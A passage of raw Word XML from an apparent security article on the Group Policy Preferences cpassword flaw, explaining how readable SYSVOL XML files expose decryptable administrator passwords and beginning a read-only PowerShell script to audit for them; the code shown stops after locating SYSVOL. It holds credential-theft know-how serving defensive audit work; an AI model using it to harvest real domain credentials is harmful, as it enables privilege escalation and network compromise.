          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason this flub </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">was considered such a high-level security disaster is because this single key was hardcoded into </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>every version of Windows globally and then made public</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the AES encryption instantly became entirely useless. It was no better than storing the passwords in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BAFA44" w14:textId="77777777"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Then came instant domain compromises. Systems administrators frequently used GPP to set the local administrator password across thousands of workstations and servers. Often, they inadvertently used a Domain Admin password for this task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE91291" w14:textId="0D394DC9"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 xml:space="preserve">Since </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> must be readable by every standard user account or machine account on the network to download policy updates, anyone could browse the files (if they knew where to look).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ttackers and penetration testers simultaneously and quickly writing simple scripts (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gpp-decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit/PowerSploit). A low-privileged attacker could log into a network, open </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Groups.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Drives.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, grab the encrypted string labeled </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cpassword</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and instantly decrypt it to instantly gain administrative credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353CA944" w14:textId="7B016EC3"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The Patch (MS14-025) and The Ongoing Trap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F452C5D" w14:textId="535D90F5"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 xml:space="preserve">Microsoft recognized the severity of the flaw and issued security bulletin </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MS14-025</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52488E21" w14:textId="39350171" w:rsid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 xml:space="preserve">What the patch did: </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It updated the Group Policy Management Console (GPMC) to completely disable the ability to type or update passwords in GPP fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC30394" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB505DF" w14:textId="50ABC08F" w:rsidR="00442C76" w:rsidRP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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The major catch (Why it remains a present-day issue): </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The patch did not delete any existing XML files containing passwords that administrators had already created over the years.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70528719" w14:textId="433F4850"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 xml:space="preserve">Because of this incomplete fix, legacy </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cpassword</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML fields have been frequently sitting buried inside old, uncleaned and unsanitized </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directories for a decade or more. During internal security audits, running a quick scan for the public GPP key remains a highly effective method for red teams </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">or attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>to achieve instant privilege escalation on older networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4F583" w14:textId="644DBD7E" w:rsid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 xml:space="preserve">With all, here is a lightweight, read-only PowerShell script that is designed to scan your </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. It searches for common Group Policy Preference XML files and checks them for the presence of the legacy, vulnerable </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cpassword=</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute.</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442C76" w14:paraId="34C803CE" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DDC0D2E" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0575CB2A" w14:textId="466C9C58" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">OTE </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>📌</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="758B9FD0" w14:textId="087ED9CA" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution Context: </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">This script requires administrative or authorized execution parameters. In hardened environments where standard users are restricted from launching </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>powershell.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> via AppLocker or WDAC, this script should be executed from an authorized audit workstation, PAW/SAW, or an administrative jump box with network visibility to the Domain Controller.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC70998" w14:textId="57B38AAE" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52CA3C7B" w14:textId="71E47B96" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:insideH w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:insideV w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00442C76" w14:paraId="4DD0D4E6" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47FB5631" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B6CE75E" w14:textId="0BF4C377" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Get the current Domain Controller name to locate SYSVOL</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$DomainController</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = (Get-ADDomainController).HostName </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$null</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Fallback to local environment variable if Active Directory module is not installed</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (-not </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$DomainController</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$DomainController</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$env:LOGONSERVER</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.Trim(</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'\'</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$SysvolPath</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"\\</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$DomainController</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\SYSVOL"</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write-Host</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 xml:space="preserve">"[*] Targeting SYSVOL at: </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$SysvolPath</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
